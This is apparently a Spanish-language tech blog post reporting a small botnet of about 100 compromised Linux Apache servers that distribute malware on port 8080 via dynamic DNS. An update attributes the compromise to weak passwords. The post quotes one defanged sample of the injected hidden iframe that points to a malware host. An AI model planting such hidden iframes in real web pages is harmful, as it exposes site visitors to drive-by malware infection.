Un investigador ha descubierto un cluster de servidores Linux convertido en botnet y utilizado para la distribución de ataques por medio de la web y de distribución de malware.

Cada maquina infectada encontrada es un equipo dedicado y hostea un sitio web legitimo. El detalle esta en que los servidores corren un servidor web para el contenido “legitimo” y un servidor extra para la distribución de malware.<br /><br />Básicamente en las maquinas el trafico legitimo salia por el puerto 80 y el servidor “extra” enviaba el trafico por el 8080. Los payloads se distribuían con la ayuda de un DNS dinámico.  Los links se ven mas o menos como esto :

<i><i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe></i>

La botnet se puede considerar pequeña ya que son 100 nodos y utilizaron como DNS dinámico los servicios de DynDNS.com y de No-IP.com. Aun no se sabe para que utilizarían estos equipos pero es interesante ver que todos utilizaban Apache en combinación a diferentes distros de Linux.

Vía VivaLinux y The Register

__________________________________________

Actualizado:

Muchos seguramente se habrán preocupado a leer la nota sobre el botnet de servidor Linux. La verdad es que no es para tanto , el problema no esta en que estos servidores ahora sean súper vulnerables como los Windows. La cosa es que los administradores de los mismos salieron medio torpes.

El motivo para la creación de la red que les comento estuvo en el uso de passwords débiles y esto es mas que nada una vulnerabilidad en del tipo Falta de capacitación en temas de seguridad para los administradores de estos equipos.

Con esto podemos seguir afirmando que Linux sigue siendo mas seguro que Windows y que fallas de password débil están presentes en cualquier tipo de sistemas cuando no se tiene una conciencia sobre seguridad entre los empleados.

Mas info

Popularity: 1% [?]

Articulos relacionados